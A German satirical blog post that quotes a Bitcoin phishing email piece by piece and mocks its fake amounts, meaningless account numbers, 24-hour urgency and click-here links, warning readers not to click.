Ganz geheime Geheimmail, unverschlüsselt und offen wie eine Postkarte durch das Internet transportiert. Konnte jeder lesen. Konnte jeder verändern. Konnte man nichts gegen machen, wenn man auf Kryptografie verzichtet. Bitte nach dem Lesen aufessen! Oder vielleicht sogar vor dem Lesen, damit der Inhalt auch wirklich geheim bleibt! 🤭️

Sie haben jetzt X10.3 neue Bitcoins auf Ihrem Konto.

Was ist das denn für ein tolles Zahlenformat? Mit einer Ziffer „X“? Hey, Spammer, hast du mal wieder dein Spamskript nicht verstanden? Das hirnt aber auch immer so, dieser ganze Technikkram! Aber hauptsache mit Konten in Bitcoin kennst du dich aus! 😁️

Übrigens würde man bei so einer Angabe „Bitcoin“ im Singular setzen, analog zu den meisten anderen Währungsbezeichnungen im Deutschen. Es redet ja auch (hochsprachlich) niemand von fünfzig Euros, zwanzig Dollars oder hundert Rubels. Die einzige wichtige Ausnahme von dieser Regel ist (neben indischen Rupien, ums nicht so einfach zu machen) die Währungsbezeichnung „Krone“, wo die Deutschsprecher tatsächlich „Kronen“ sagen, wenn es mehr als eine Krone ist. Das liegt vermutlich daran, dass „Krone“ auch ein Wort für die Klunkerausstellungen auf dem Kopf eines Königs oder einer Königin ist und dass in diesem Kontext der Singular irgendwie im Munde klemmt, wenn man mehrere benennt. 👑️

Manchmal bin ich froh, dass ich Deutsch schon ein bisschen kann und nicht erst lernen will oder muss. Es wäre ein Gepauke, fast so übel wie Latein. 😉️

Wir versuchen Sie bezüglich der ausstehenden Transaktionsbestätigung zu kontaktieren. Bitte fahren Sie unten fort, um auf Ihre ausstehende Transaktion zuzugreifen.

MEHR DETAILS ANZEIGEN

„Ihr“ habt nicht einmal einen Namen von mir, mein niemals von mir eingerichtetes Konto, das diese „Transaktion“ mit einem „X“ in der Ziffernfolge des Betrages von einem Unbekannten empfangen haben soll, hat bis jetzt nicht einmal eine Kontonummer. Die Spam ist völlig unpersönlich. Alles, was ihr in eurer „strengvertraurlichen“ Spam habt, ist ein Link zum klicken, wenn ich erfahren will, was euer dummes Gestammel bedeutet. 🖱️

Da müsste ich aber ganz schön doof sein, wenn ich darauf klickte. 🖕️

Diese E-Mail enthält die Informationen die Sie benötigen um auf die Transaktionsbestätigung zuzugreifen!

Aha! Jetzt fühle ich mich aber richtig informiert! 💡️

Bitte überprüfen Sie die unten aufgeführten Informationen.

Kontonummer: 981257297

Transaktionsnummer: 76102486

Konto-ID: 91BTC2DE90

Transaktion: 2-4833BTC

Wie soll ich diese „Informationen“ eigentlich überprüfen? Soll ich mir ein paar Zahlen auswürfeln…

$ dd if=/dev/urandom bs=32 count=1 status=none | od -tu4 | sed 's/^[0-9]*\s*//' | sed '/^\s*$/d'
2898345060  636924953   86444252 1779965961
1585925590 1587485805  180572526 4253870169
$ _

…und mal gucken, ob die mit euren Zahlen übereinstimmen? Das tun sie natürlich nicht. Das wäre auch seltener als ein Sechser im Lotto gewesen. Und was ist eigentlich der Unterschied zwischen einer Kontonummer und einer Konto-ID? Wieso brauche ich beide, wenn doch jede für sich eindeutig sein sollte? Das gleiche gilt noch mal für die beiden lustigen Nummern zu einer angeblichen Transaktion. Die sollten doch auch beide jeweils für sich eindeutig sein, denn sonst wird es schwierig mit der Buchhaltung, und das Geld landete auf mehreren Konten gleichzeitig. Aber dann genügte auch eine Nummer. 🤦‍♂️️

Man wird beim Hinschauen den Eindruck nicht los, dass diese Zahlen nur einen Zweck haben: Den Empfänger zu beeindrucken. Damit er denkt, es sei etwas ganz was Wichtiges. Bei Menschen, deren IQ über der Raumtemperatur liegt, löst so etwas nur gebieterische spontane Heiterkeit aus. 😂️

Gesamt erhalten:
€ 198.380,28

Transaktion jetzt bestätigen (Hier klicken)

Bitte bestätigen Sie diese Transaktion innerhalb von 24 Stunden ansonsten verfällt Ihr Guthaben (Hier klicken)

Wir kennen das ja alle von unseren Banken, dass man nach dem Empfang einer Überweisung binnen 24 Stunden klicken muss, sonst steckt sich die Bank das Geld in die Tasche und man hat nichts davon… 🤣️

Mit freundlichen Grüssen

Luca Baumann

Freundlich wie eine Ohrfeige fürs Gehirn
Dein Bitcoin-Reichwerdspammer aus der Affiliate-Hölle

Wenn Sie von uns nicht erneut kontaktiert werden möchten klicken Sie HIER

Ja, Spammer, du kannst mich auch mal! 👅️

Diese Spam aus dem täglichen Irrenhaus des Posteinganges ist ein Zustecksel meines Lesers A. H.